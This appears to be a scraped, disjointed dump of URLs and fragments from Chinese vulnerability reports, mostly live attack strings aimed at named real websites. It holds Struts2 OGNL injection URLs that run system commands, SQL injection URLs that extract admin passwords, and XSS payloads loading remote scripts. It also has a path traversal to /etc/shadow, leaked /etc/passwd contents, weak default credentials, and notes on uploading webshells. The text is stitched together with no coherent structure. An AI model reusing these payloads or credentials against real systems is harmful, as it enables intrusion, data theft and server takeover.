http://www.gssf.gov.cn/dwjs/showmsg.asp?name=%B6%D3%CE%E9%BD%A8%C9%E8&ID=32423%27 http://livecast.sina.com.cn/infolive/keyonline.php http://www.xirang.com/ http://www.4k4k.cn/user/usershow.asp?username=wwee11 http://bbs.hlgnet.com/jh.php?boardid=1 http://www.epailive.com/member/favoAction_delAppMemFavo.do?type=1&favoCateId=&orderBy=0&favoObjId=23342 http://www.epailive.com/member/favoAction_delAppMemFavo.do?type=1&favoCateId=&orderBy=0&favoObjId=23342 http://www.epailive.com/member/favoAction_delAppMemFavo.do?type=1&favoCateId=&orderBy=0&favoObjId=1 http://www.epailive.com/member/favoAction_delAppMemFavo.do?type=1&favoCateId=&orderBy=0&favoObjId=2 http://www.epailive.com/member/favoAction_delAppMemFavo.do?type=1&favoCateId=&orderBy=0&favoObjId=3 http://www.epailive.com/member/favoAction_delAppMemFavo.do?type=1&favoCateId=&orderBy=0&favoObjId=23342 http://www.uqee.com/service/appealquery http://www.uqee.com/e/admin/sectest.php,这个小马干掉。 www.kuailezu.com http://www.kuailezu.com http://www.kuailezu.com/user.php?m=member.info http://www.kuailezu.com/user.php?m=member.setMemberEmail http://ielts.etest.edu.cn/cn/?DocName=News20121214c&__id=AppMain.dsaNews.ShowNews http://ielts.etest.edu.cn/cn/?DocName=News20121214c http://ielts.etest.edu.cn/cn/?DocName=News20121214c http://tuchong.com/ javascript:document.cookie http://kaka.meitu.com/20100214/step1.php# http://web3.gsli.edu.cn:8090/rsc/info_show.asp?flag=%25u4EBA%25u4E8B%25u52A8%25u6001%20aboutid=273&aboutid=273 http://hd.sgamer.com/index.php?m=Ask&sid=101 http://wooyun.org/bugs/wooyun-2010-023668在之前我还给搜狐的朋友报了一个存储型xss,感觉还是很多问题的。这次则是出现在加关注的接口上。通过测试,发现加关注接口是通过get方式传输的。抓包得到如下数据 rv:20.0 http://dfzq.3g.qq.com/front/football.php?cmd=home&a=excise&nobak=1&ty=zsyl&t=1353891036&oid=2fc92877ddf7d3df&sid2=6472f9429563985b http://dfzq.3g.qq.com/front/football.php?cmd=home&a=excise&nobak=1&ty=zsyl&t=1353891036&oid=2fc92877ddf7d3df&sid2=6472f9429563985b http://www.renrendai.com/calculate.action?amount=120000&apr=11&repayTime=12000000&show=true&type=DEBX&manageFeeShow=true http://agent.xinnet.com/ http://support.zte.com.cn http://support.zte.com.cn/support/topicality/Homepage.aspx论坛 http://item.taobao.com/item.htm?spm=a230r.1.0.224.BEYcmd&id=2703000597 http://hd.jsbc.com/bxlz/index.aspx http://www.hzfc.gov.cn/newfj.php?fid=7725 www.premedia.cn开刀吧 admin.data.house.sina.com.cn/newhouse/manage.php?&a=login http://gy.315.com.cn/freem!index.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) http://3g.56.com/index.php?action=Activity&do=Vlist&pn=2&id=196 http://milfans.news.sina.com.cn/admin/login.php http://rb.56.com/index.php?action=CategoryOne&do=Run&status=1&page=3&category_id=30 http://eat.gd.sina.com.cn/2008mssd/diy/content.php?id=4888 http://eat.gd.sina.com.cn/food_search/content.php?id=644 http://seme.bupt.edu.cn/login/Jeecms.do http://party.zj.com/ljddh/index.php?id=17 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin mysqlftp:x:500:500::/data/yls:/sbin/nologin http://www.whrt.gov.cn:8200/web/tms/JobList.aspx?t=1 http://www.whrt.gov.cn:8200/web/tms/Page.aspx?id=43 http://help.10010.com/web/icc/chat/chat?c=1&s=1 http://onlinechat.gome.com.cn/web/common/doUpload.action http://im.e-picc.com.cn/web/icc/chat/chat?c=1&s=3 URL:http://client.cmge.com/admin/ error:function() http://shop.xunlei.com/?controller=myorder&action=result&id=1001 http://eg.chengdu.gov.cn/front/login/login!login.action javascript:alert(document.domain) http://huodong.56.com/2013/diaocha/index.php?id=25 http://fbt.02753.com/images/coins.png http://126.am/xxxx.js http://converse.56.com/movieshow/index.php?vodid=2 http://mail.qq.com http://www.baidu.com/s?word=FX6300%E6%80%A7%E8%83%BD%E6%B5%8B%E8%AF%95%E5%92%8C%E5%AF%B9%E6%AF%94%E6%B5%8B%E8%AF%95%EF%BC%882%E6%A5%BC%E6%9B%B4%E6%96%B0%E8%B6%85%E9%A2%91FX6300%E5%AF%B9%E6%AF%94I3+3220,%E5%AE%8C%E8%83%9C%EF%BC%9F%EF%BC%89&tn=sitehao123&ie=utf-8 http://huodong.56.com/2013/diaocha/index.php?id=25 http://xiu.56.com/ http://xiu.56.com/index.php?action=SnsApi&do=Publish http://c.p313.56img.com/photo2video/upImg/d1/68/2/thumb_kjtest09_5194f16315b20269.jpg http://xiu.56.com/index.php?action=SnsApi&do=Publish http://c.p313.56img.com/photo2video/upImg/d1/68/2/thumb_kjtest09_5194f16315b20269.jpg\ px1624.sinaapp.com/t.js http://xiu.56.com/index.php?action=Sns&do=photoWall&uid=kjtest09 http://xiu.56.com/index.php?action=SnsApi&do=DoFollow&attr=follow&t=0.8027756286319345&follow_user_id=用户名 http://www.gdzl.gov.cn/notice/login.do存在struts命令执行漏洞 http://www.gdzl.gov.cn http://corp.56.com/extmail/cgi/index.cgi http://wuxizazhi.cnki.net/ http://www.cnzz.cc/Soft/4611.html http://www.theskinfoodchina.cn http://jsca.miitbeian.gov.cn/icpproject_state/system/login/receiveTicket.action http://xjca.miitbeian.gov.cn/system/login/receiveTicket.action http://cqca.miitbeian.gov.cn/system/login/receiveTicket.action http://sxca.miitbeian.gov.cn/system/login/receiveTicket.action http://scca.miitbeian.gov.cn/system/login/receiveTicket.action http://ahca.miitbeian.gov.cn/system/login/receiveTicket.action http://sdca.miitbeian.gov.cn/system/login/receiveTicket.action http://www.channelping.net/indexAction.action http://baidu.my.leju.com/phpinfo.php http://kfy.whu.edu.cn/kfy/infsearch.action http://kyc.utibet.edu.cn/index.action?method=branchContent&id=44 http://conf.ccf.org.cn/ccice/firstPage/index.action http://www.tjjl.ac.cn/index.action http://display.sysu.edu.cn/web/webInstrument!list.action http://www.hedatj.gov.cn/cms/list!detail.action http://www.syfc.gov.cn/fqzj/fcxx.action http://www.scdxcfo.net/items/index.action?item_id=22 http://www.hualin.com.cn/zpxxAction!index.action http://www.sunnysky.net.cn/channel!Index.action http://www.ljsy.net/index.action http://univ.zte.com.cn/ztetrain/news/templates/view1.aspx?id=2131 http://tra-b2g.ceair.com/WebUI/ http://211.94.67.214:8080/wrs/rsSecureLogin.do?CmdID=458 http://211.94.67.214:8080/wrs/attachments.do?CmdID=450&file=D:\HuaweiTechnologies\iWebReportServer\bin\workspace\attachments\1922\Error_Log.txt http://123.125.116.180/ http://support.zte.com.cn/MOBILE/Application/HandSet/ShowHandSet.aspx?id=32120 http://support.zte.com.cn/support/topicality/uploadFrame.aspx http://support.zte.com.cn/support/uploads/下 http://tuan.szonline.net/ http://218.56.49.37:81/license!getExpireDateOfDays.action display:block;height:800px;width:600px http://www.xxx.com/admin/affiliate_ck.php?act=list&auid=121%20or%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23 http://www.momax.net.cn/chi/media1_detail.php?tid=1&Id=103 http://115.236.20.88:9103/ http://t.sohu.com/twAction/deleteTwitter http://www.mmachina.cn,便打开看了下发现是JEECMS搭建的,果断百度下相关信息,找到了默认后台,而且竟然是默认账户密码,进入后台,资源管理处上传JSP马得到webshell,上面发现好多人人网活动数据库和以前的活动程序啊,最近比较喜欢人人活动,激动啊,不过也就看了下目录,没动数据O(∩_∩)O哈! http://dp.sina.cn/dpool/tools/longbus/station.php?id=12152 http://newscms.house365.com/edit.php?ids=5433 http://ztc.sznews.com/ts/login/adminLogin.do http://ztc.sznews.com/ts/pages/lodge/login/default.jsp登录后在"我要表扬"页面直接上传jsp木马 http://www.insecure.org/nmap/ B1:1C:8E:BA:3B BA:07:FA http://photo.club.sohu.com/dragon/login.php http://photo.club.sohu.com/dragon/admin/creat_url_form.php http://photo.club.sohu.com/dragon/admin/commend_list.php?start=50&classid=2 http://imagesi.jstv.com/service.php http://www.indaa.sgcc.com.cn:8288/Login.aspx http://180.149.132.210 http://www.ccjczy.com/News.action?urlNewsID=2013423YB34 http://vgirl.weibo.com/bbs http://220.181.181.200 http://220.181.181.200///contact https://XXXX http://210.51.19.163/auth/index http://my.yihaodian.com/member/myCollection/deleteCollectionTag.do?tagProduct.tagID=3110033 http://my.yihaodian.com/member/myCollection/deleteCollectionTag.do?tagProduct.tagID=3110033 http://my.yihaodian.com/member/myCollection/deleteCollectionTag.do?tagProduct.tagID=1 http://my.yihaodian.com/member/myCollection/deleteCollectionTag.do?tagProduct.tagID=2 http://my.yihaodian.com/member/myCollection/deleteCollectionTag.do?tagProduct.tagID=3110033 http://tag.cernet.com/login.do http://icp.cernet.com/login.do http://big5.cntv.cn/gate/big5/xmg.xmtv.cn/board/onemessage.asp?id=10270 http://116.213.70.89/xdf/ http://sn.189.cn/shop/comboArea/htmls/21001753.html?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,@org.apache.commons.io.FileUtils@readFileToString(new%20java.io.File(%22/etc/issue%22)) http://ah.189.cn/shop/mobile/htmls/3025.html?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,@org.apache.commons.io.FileUtils@readFileToString(new%20java.io.File(%22/etc/issue%22)) http://cloud.189.cn/sendDownloadUrlMessage.action?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,@org.apache.commons.io.FileUtils@readFileToString(new%20java.io.File(%22/etc/issue%22)) http://118.123.221.116/t/sss.html?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,@org.apache.commons.io.FileUtils@readFileToString(new%20java.io.File(%22/etc/issue%22)) http://qh.189.cn/shop/mobile/htmls/2264.html?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,@org.apache.commons.io.FileUtils@readFileToString(new%20java.io.File(%22/etc/issue%22)) http://pcc.263.net/PCC/loginMail.do http://211.150.64.86/PCC/loginMail.do http://211.150.64.87/PCC/loginMail.do http://211.150.64.88/PCC/loginMail.do http://xss.retaker.me/1.js xss.retaker.me/1.js\\ http://chunjie.wlj-china.com/data.zip http://w.xdf.cn/TeacherCourse.html?teacherID=285341 http://p.hsort.com/SimpleShow.aspx?paperName=%e5%a4%a7%e5%90%8c%e6%96%b0%e9%97%bb%e7%bd%91%e6%95%b0%e5%ad%97%e6%8a%a5%e5%88%8a%ef%bc%8c%e7%94%b5%e5%ad%90%e6%8a%a5%e5%88%8a&qnum=1 inurl:qnum=;inurl:papername=,可以找到很多站点,大同新闻网,黑龙江经济报,西南政法大学报,广东外语外贸大学报,小地方的报纸等,部分使用的老版安全狗,很容易被绕过 http://110.75.32.56 http://crm2.qq.com/page/portalpage/reject_msg.php?k=b66b5cf124e37a6c0b67999373ca83b9ac9bc34586ef022dd688321c6c3c3ccd http://61.135.150.151 http://110.75.66.47/ d.youc.com/dede/ http://d.youc.com//plus/search.php?keyword=as&typeArr[111%3D@`\ http://www.polypay.cn/cnothers/ http://item.taobao.com/item.htm?spm=a230r.1.14.69.zk34BW&id=25101676408&_u=k3jfumt58e4 http://www.tmall.com/?ali_trackid=2:mm_34019173_0_0:1369039267_3k9_1575965793 http://yun.taosoft.com.cn/taoflash/swf/1666424963/1367227913539.swf?cid=tb1666424963&pid=c3dmLzE2NjY0MjQ5NjMvMTM2NzIyNzkxMzUzOS5zd2Y= http://www.locailed.com/cc/cc1.html http://yun.taosoft.com.cn/taoflash/swf/1666424963/1367227913539.swf?cid=tb1666424963&pid=c3dmLzE2NjY0MjQ5NjMvMTM2NzIyNzkxMzUzOS5zd2Y= http://www.locailed.com/cc/cc1.html_blank@ http://www.wuerth.com.cn/html/NewsView_cn.php?id=39 http://www.aliyun.com/user?m=ajaxcomm&ac=getuserstatus http://ts.21cn.com/Home/post http://tti.pw/index.php/1/ http://www.frg.renren.com/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+0,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=a http://www.ztx.renren.com/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\%27%60+]=a http://big5.cntv.cn/gate/big5/ http://big5.cntv.cn/gate/big5/cms.cntv.cn/CMS/permission/loginajaxUserLoginAction.action?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@org.apache.commons.io.FileUtils@readFileToString http://wooyun.org/bugs/wooyun-2010-08281 http://sispub.ssr.chinacache.com)存在弱口令 test:test http://shsj.caep.ac.cn/zxzc/notice.asp?meetingid=3 http://zpxx.caep.ac.cn/login.asp http://yjsb.caep.ac.cn/LoginForWeb.aspx http://cms.caep.ac.cn:888/cms/ http://yjsb.caep.ac.cn/Default.aspx?ReturnUrl=%2fSecurity%2fPassWord%2fAdminPwd.aspx http://www.epanel.com.cn/epanelweb/client/bot/toPersonQuestion.htm URL:http://hy.shenzhenpost.com.cn/shop/member!passwordRecover.action http://www.icareishare.com.cn/soul/SoulFront/appointment_front_ashow.action?channelCode=10100&articleId=8a3f98963e9b5fc5013eb6ee07a8082a http://www.icareishare.com.cn/soul/SoulFront/appointment_front_ashow.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) http://q.stock.sohu.com/jlp/org/info.up?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23xman=@org.apache.struts2.ServletActionContext@getResponse(),%23xman.getWriter().println(%23req.getRealPath(%22/%22)),%23xman.getWriter().close() http://s.learning.sohu.com/search.sip?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23xman=@org.apache.struts2.ServletActionContext@getResponse(),%23xman.getWriter().println(%23req.getRealPath(%22/%22)),%23xman.getWriter().close() http://pic.yule.sohu.com/goSearch.sip?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23xman=@org.apache.struts2.ServletActionContext@getResponse(),%23xman.getWriter().println(%23req.getRealPath(%22/%22)),%23xman.getWriter().close() http://pic.music.sohu.com/goSearch.sip?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23xman=@org.apache.struts2.ServletActionContext@getResponse(),%23xman.getWriter().println(%23req.getRealPath(%22/%22)),%23xman.getWriter().close() http://pic.v.sohu.com/goSearch.sip?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23xman=@org.apache.struts2.ServletActionContext@getResponse(),%23xman.getWriter().println(%23req.getRealPath(%22/%22)),%23xman.getWriter().close() http://jxjy.bfa.edu.cn http://ciscn.cn/jsp/index/downFile.jsp?filename=/../..//../..//../..//../..//../..//etc/shadow http://123.125.116.227/ http://oa.chinapay.com/yyoa/index.jsp http://www.seeyon.com/ http://www.now.cn/pay/itemstatus.net?IDAAction=5587144 http://203.95.110.84/ http://www.maxen.com.cn/plus/search.php?keyword=as&typeArr[111%3D@`\ http://www.maxen.com.cn/dede/login.php?gotopage=%2Fdede%2F http://www.91yong.com:4848/ https://zxl.91yong.com:4848/ admin:admin http://www.now.cn/domain-admin/Contactupdate.php?IDContact=43107116&isshow=true&code=a8bdd6b3615ebbc951e30c6cf8702a69&cType=%B9%FA%BC%CA%D3%F2%C3%FB http://www.now.cn/domain-admin/Contactupdate.php?IDContact=43107651&isshow=true&code=a8bdd6b3615ebbc951e30c6cf8702a69&cType=%B9%FA%BC%CA%D3%F2%C3%FB http://www.now.cn/domain-admin/Contactupdate.php?IDContact=43007122&isshow=true&code=a8bdd6b3615ebbc951e30c6cf8702a69&cType=%B9%FA%BC%CA%D3%F2%C3%FB http://s.weibo.com/user/&former=%22%3E%3Cimg%20onerror=alert%28/x/%29%20src=x%20/%3E%3C!-- http://yangshan.shciq.gov.cn/article.aspx?artid=622 http://yangshan.shciq.gov.cn/article.aspx?artid=622 http://ln.sina.com.cn/tools/new_frame.html?javascript:alert(1) http://info.theskinfoodchina.cn:8080/response/ http://info.theskinfoodchina.cn:8080/到浏览器打开出现了登陆界面 test:test的弱口令从而进入了邮件发送系统后台 http://data.auto.sina.com.cn/car/api/getCarInfo2motu.php?subid=573 http://data.auto.sina.com.cn/car/api/getCarInfo2motu.php?subid=573 http://bj.bbs.house.sina.com.cn:80/bbs/post/show?pid=5742081790378527840 http://bj.bbs.house.sina.com.cn:80/bbs/post/show?pid=5742081790378527840 http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/page_moduel/hqad.php?type=2 http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/page_moduel/hqad.php?type=2 http://weidealer.auto.sina.com.cn/api/auto/difang/get_carpay_rec.php?callback=jsonp1369149048230&province=23&country=all&limit=6&t=jsonp&x=0.19883825746364892&city=1 http://weidealer.auto.sina.com.cn/api/auto/difang/get_carpay_rec.php?callback=jsonp1369149048230&province=23&country=all&limit=6&t=jsonp&x=0.19883825746364892&city=1 http://www.phpwind.net/read/2993589 http://www.xxxxxx.com.cn/edit/db/ewebeditor.mdb http://www.ocnsh.com.cn/admin/aspcheck.asp http://www.chinarishi.gov.cn/gonggaoneirong.php?id=448此处存在注入漏洞 http://www.cshtz.gov.cn/spweb/serviceOnline/baseinfo/baseinfoonline.jsp http://book.duokan.com/__duokan_appapi/packed/store/ipad_review.html?book_id=77779b94acd94d38a451bd69658f9bc3&build=2013030401 http://www.bidding.citic.com/work/work!workList_front.action javascript:alert(document.cookie) http://bj.58.com/xingqu/13977470055945x.shtml http://www.pmcitic.com/news/news!newsList_front.action?%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27\43context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\75false%27%29%28b%29%29&%28%27\43c%27%29%28%28%27\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27\43req\75@org.apache.struts2.ServletActionContext@getRequest%28%29%27%29%28d%29%29&%28h%29%28%28%27\43webRootzpro\75@java.lang.Runtime@getRuntime%28%29.exec%28\43req.getParameter%28%22cmd%22%29%29%27%29%28d%29%29&%28i%29%28%28%27\43webRootzproreader\75new\40java.io.DataInputStream%28\43webRootzpro.getInputStream%28%29%29%27%29%28d%29%29&%28i01%29%28%28%27\43webStr\75new\40byte[1024]%27%29%28d%29%29&%28i1%29%28%28%27\43webRootzproreader.readFully%28\43webStr%29%27%29%28d%29%29&%28i111%29%28%28%27\43webStr12\75new\40java.lang.String%28\43webStr%29%27%29%28d%29%29&%28i2%29%28%28%27\43xman\75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28i2%29%28%28%27\43xman\75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28i95%29%28%28%27\43xman.getWriter%28%29.println%28\43webStr12%29%27%29%28d%29%29&%28i99%29%28%28%27\43xman.getWriter%28%29.close%28%29%27%29%28d%29%29&cmd=cmd%20/c%20ipconfig http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Huawei.Switch.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=/2network http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Dell.Force10.Switch.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=/2network http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Netflow.v5.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=../ http://member.ffpic.com/tools/FindPass.ashx http://pmscjss.mofcom.gov.cn/auc/_news/newslist_common.jsp?cata=1 http://pmscjss.mofcom.gov.cn/auc/merge/sql.sql http://secaqb.anquanbao.org/sqlin.php?id=9 http://secaqb.anquanbao.org/sqlin.php?id=9 http://zhidao.baidu.com/question/437176497.html http://secaqb.anquanbao.org/sqlin.php?id=9 http://secaqb.anquanbao.org/sqlin.php?id=9 http://secaqb.anquanbao.org/sqlin.php?id=9 http://secaqb.anquanbao.org/sqlin.php?id=-9%20or(-1)in(1) http://secaqb.anquanbao.org/sqlin.php?id=-9%20union http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%20select http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect%0b1,user(),version(),database() http://blog.anquanbao.org/61/ http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect%201,user(),version(),database() http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect-1,user(),version(),database() http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect%2b1,user(),version(),database() http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect@`1`,user(),version(),database() http://copartner.mbaobao.com/codapp/Admin/Login.aspx http://wap.mbaobao.com/index.php/order/info/orderId/订单号/type/2 www.anying.org http://control.blog.sina.com.cn/myblog/htmlsource/quotelist.php?blogid=4726dd840102e6yw'%20and%20substring http://qhsoftoa2012.gnway.net:8082 https://online.unionpay.com/huankuan/main.do https://online.unionpay.com/portal/index.do?username= user:cpinsweb shell:/home/cpinsweb/jboss-4.2.3.GA/server/default/./tmp/deploy/tmp4987379269087835336phoenix-portal-exp.war/ avahi-autoipd:x:102:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin cp_web:x:500:500:cp_web:/home/cp_web:/bin/bash monitor:x:501:500:monitor:/home/monitor:/bin/bash mk_web01:x:502:500:mk_web01:/home/mk_web01:/bin/bash um_web:x:503:500::/home/um_web:/bin/bash zabbix:x:504:502::/home/zabbix:/bin/bash cpinsweb:x:505:500::/home/cpinsweb:/bin/bash syschk:x:506:506::/home/syschk:/bin/bash jboss-4.2.3.GA/server/default/deploy/phoenix-portal.war http://shop.tcl.com/ http://www.jsj.edu.cn/index.php/default/index/sort/1 http://www.jsj.edu.cn/index.php/default/index/sort/1%20or%201 http://www.jsj.edu.cn/index.php/default/index/sort/1%20union%20all http://secaqb.anquanbao.org/xss.php http://secaqb.anquanbao.org/xss.php?gcode= width:1px;filter:glow%20onfilterchange=alert('piaoye') http://msdn.microsoft.com/en-us/library/ms532847%28VS.85%29.aspx http://secaqb.anquanbao.org/xss.php?gcode=%3Cembed%20src=http://www.p-ye.cn/cfrs/%20%3E%3C/embed%3E http://ha.ckers.org/xss.css http://secaqb.anquanbao.org/xss.php?gcode=%3CSTYLE%3E%40im%5Cpo%5Crt'http%3A%2F%2Fha.ckers.org%2Fxss.css'%3B%3C%2FSTYLE%3E http://secaqb.anquanbao.org/xss.php?gcode=%3CDIV%20STYLE%3D%22width%3A%EF%BD%85%EF%BD%98pre%EF%BD%93sion(alert('piaoye'))%3B%22%3E ascript:alert('anyunix') http://secaqb.anquanbao.org/xss.php?gcode=%3CIMG%20SRC%3D%22jav%26%23x09%3Bascript%3Aalert('piaoye')%3B%22%3E http://ha.ckers.org/xss.css http://secaqb.anquanbao.org/xss.php?gcode=%3Clink%20rel%3D%22stylesheet%22%20HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E javascript:alert('XSS') script:alert('piaoye') http://secaqb.anquanbao.org/xss.php?gcode=%3CTABLE%20BACKGROUND%3D%22java%26%23x0D%3Bscript%3Aalert('piaoye')%22%3E http://123.125.116.213/ http://wooyun.org/bugs/wooyun-2010-022762 http://wooyun.org/bugs/wooyun-2010-019360 http://114.112.94.111/) http://114.112.94.111/logs/) http://mgm.1kan.tv(这里说一下 http://mgm.1kan.tv http://mgm.1kan.tv http://secaqb.anquanbao.org/sqlin.php?id=-9.union%0Bselect~1,database%28%29,3,4 http://jianli.58.com/interviewinvitereceive/?list=apply&type=1&infoid=13503944312714 http://su.58.com/tech/12972441389827x.shtml http://jianli.58.com/interviewinvitereceive/?list=apply&type=1&infoid=12972441389827 http://qipai.sina.com.cn/news_content.php?id=141 http://qipai.sina.com.cn/news_content.php?id=640 http://qipai.sina.com.cn/news_content.php?id=637 javascript:alert(document.cookie) http://love.ganji.com/199909446.htm http://sd6.tbcdn.cn/dcAsyn.htm?h=p_lazyHd_sid130918286_pid185916040&v=1&sv=1&siteId=3&virtual=false&flagShip=false&int=false&ins=true&dn=&sci=2&dvh=1&dr=1&df=1&l=p_lazyLeft_sid130918286_pid185916040&r=p_lazyRight_sid130918286_pid185916040&f=p_lazyFt_sid130918286_pid185916040&t=1369289309136&css=css_sid62168109 http://kde.cnki.net/KDEService/Search/Brief/CJFD/?Author=黄志光 http://kde.cnki.net/KDEService/Search/Brief/CJFD/?Author=黄志光 http://kde.cnki.net/KDEService/Search/Brief/CJFD/?黄志光 http://kde.cnki.net/KDEService/Search/Brief/CJFD/?Author=黄志光 www.lzj【马赛克】.com http://whois.chinaz.com/www.lzj【马赛克】.com www.net.cn www.west263.com www.szhot.com www.sudu.cn www.npointhost.com www.eb.com.cn http://www.baidu.com:80@www.evil.com/之类的域名没有进行跳转提示或者显示真实域名,用户可能会被一个恶意构造的域名欺骗。 http://www.evil.com/ http://wap.uc.cn/index.php?action=BrandPicApi&brand=nokia http://wap.ucweb.com/test/ http://xss.tw/XXX http://db.duowan.com/sgcq/zb.php?key=%E6%88%98%E5%A3%AB www.sxinfo.gov.cn http://218.26.227.165/book/topic/vote/Com_content.do?label=2012news&id=8a8a899b3d803908013d80a578e10016 dword:00000002 http://sourceforge.net/projects/filezilla/ http://ip.filezilla-project.org/ip.php http://www.doov.com.cn/dwnews.html?layout=dvnewdetails&sid=1&artid=1094%20and%201=2%20union%20select%201,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 http://www.doov.com.cn/dwnews.html?layout=dvnewdetails&sid=1&artid=1094%20and%201=2%20union%20select%201,Password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20mysql.user%20where%20User%20=%20'root http://www.doov.com.cn/dadmin/Sys_login.php http://beian.021.net/ 